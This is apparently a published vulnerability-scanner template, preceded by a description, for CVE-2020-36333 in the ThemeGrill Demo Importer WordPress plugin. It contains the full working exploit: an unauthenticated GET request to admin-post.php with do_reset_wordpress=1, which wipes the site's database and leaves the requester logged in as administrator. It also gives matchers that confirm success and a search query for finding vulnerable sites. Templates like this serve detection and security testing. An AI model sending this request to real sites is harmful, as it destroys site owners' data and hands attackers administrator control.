ThemeGrill Demo Importer before 1.6.2 does not require authentication for wiping the database due to a reset_wizard_actions hook. In versions 1.3.4 and above and versions 1.6.1 and below, there is a vulnerability that allows any unauthenticated user to wipe the entire database to its default state after which they are automatically logged in as an administrator.
PoC代码[已公开]
id: CVE-2020-36333
info:
name: ThemeGrill Demo Importer < 1.6.2 - Database Reset
author: iamnoooob,pdresearch
severity: critical
description: |
ThemeGrill Demo Importer before 1.6.2 does not require authentication for wiping the database due to a reset_wizard_actions hook. In versions 1.3.4 and above and versions 1.6.1 and below, there is a vulnerability that allows any unauthenticated user to wipe the entire database to its default state after which they are automatically logged in as an administrator.
reference:
- https://www.openwall.com/lists/oss-security/2020/02/19/1
- https://nvd.nist.gov/vuln/detail/CVE-2020-36333
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2020-36333
cwe-id: CWE-285
epss-score: 0.50218
epss-percentile: 0.97706
metadata:
verified: true
max-request: 1
product: themegrill-demo-importer
vendor: themegrill
fofa-query: body="/plugins/themegrill-demo-importer"
tags: cve,cve2020,wp,wordpress,wp-plugin,themegrill,vkev,vuln
http:
- raw:
- |+
GET /wp-admin/admin-post.php?do_reset_wordpress=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'len(body)==0'
- 'status_code == 302'
- 'contains_all(header, "wordpress_logged_in_", "reset=true")'
condition: and
# digest: 4b0a00483046022100eb8e0cfb4a1f4d18aa6d8fe4faad8a94e97bd8bf8a5f10f9ba239c0512693f6d022100f5c52aa545fb1c58ef4ea14626979cfcfba5c5bd44ea81622038b7f78ce8c7a7:922c64590222798bb761d5b6d8e72950